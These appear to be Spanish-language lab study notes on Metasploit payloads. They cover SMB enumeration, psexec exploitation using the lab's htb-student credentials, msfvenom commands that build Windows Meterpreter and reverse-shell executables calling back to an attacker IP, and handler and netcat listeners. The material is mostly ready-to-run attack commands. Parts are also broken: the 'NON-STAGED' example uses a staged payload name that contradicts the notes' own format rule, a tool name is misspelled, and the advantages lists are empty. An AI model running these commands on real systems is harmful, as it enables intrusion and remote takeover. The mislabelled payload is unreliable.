💣 Payloads

🔹 En computación, el payload es el mensaje o instrucción real que viaja en un paquete.
🔹 En ciberseguridad, es el código o comando que explota una vulnerabilidad y ejecuta una acción (maliciosa o controlada).

📧 Ejemplo: El texto que escribes en un email sería el payload del paquete de datos que viaja por Internet.

🔍 Ver todos los payloads disponibles

msfvenom -l payloads

🧩 Tipos de Payloads

💥 Staged Payload

📦 Se envía en etapas:
1️⃣ Primera etapa → Pequeña, solo abre conexión con el atacante.
2️⃣ Segunda etapa → Envía la carga completa.

✅ Ventajas:

📝 Formato: linux/x86/shell/reverse_tcp

El / indica separación de etapas.

🛠 Ejemplo de explotación SMB con Metasploit

Tenemos una máquina con samba
{FF351CC8-7902-4943-BB8C-E2621DF7665A}.png
📌 Listar recursos compartidos:

smbclient -L 10.129.201.160 -U htb-student

💡 Detectamos ADMIN$ abierto
Pasted image 20250811175336.png
📌 Abrir Metasploit:

msfconsole

Utilizamos exploit/windows/smb/psexec para escalar privilegios

use exploit/windows/smb/psexec
set LHOST <tu_ip_atacante>
set RHOSTS <ip_victima>
set SMBUSER htb-student
set SMBPass HTB_@cademy_stdnt!
set SHARE ADMIN$

Recomendable utilizar el comando show options para ver los campos

{DA4B71F4-D914-4644-A545-C1E0A273C60D}.png
📌 Obtener shell:
{0D49BD74-1E42-453C-9E7A-9221303DA8B1}.png

🧪 Creación del Payload Staged

msfvenom -p windows/x64/meterpreter/reverse_tcp --platform windows -a x64  LHOST=192.168.126.134 LPORT=4646 -f exe -o reverse.exe

🧠 Crea un ejecutable reverse.exe con un payload Meterpreter reverse shell en Windows x64.

Listener en Metasploit:

sudo msfdb run
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp

📌 Ver opciones:

show options

Configura tu IP y puerto:

set LHOST 192.168.126.134
set LPORT 4646

🎯 Inicia el listener:

run

🛠️ Shell Reverse Manual (Sin Meterpreter)

msfvenom -p windows/x64/shell_reverse_tcp --platform windows -a x64  LHOST=192.168.126.134 LPORT=4646 -f exe -o reverse.exe

🎧 Escuchamos con Netcat:

nc -lvnp <puerto>

🧽 Mejora la terminal (para soporte de flechas, autocompletado...):

rlwap nc -nlvp <puerto>

💥 Payload Non-Staged

📦 Se envía todo el código de una sola vez.

✅ Ventajas:

🚨 Desventaja: Más visible para sistemas de seguridad.
📝 Formato: linux/zarch/meterpreter_reverse_tcp

🧪 NON-STAGED Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp --platform windows -a x64  LHOST=192.168.126.134 LPORT=4646 -f exe -o reverse.exe

⚙️ Configuración en Metasploit:

sudo msfdb run
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp

🔁 Mismo procedimiento, pero usando el payload non-staged.

show options

Configura tu IP y puerto:

set LHOST 192.168.126.134
set LPORT 4646

🎯 Inicia el listener:

run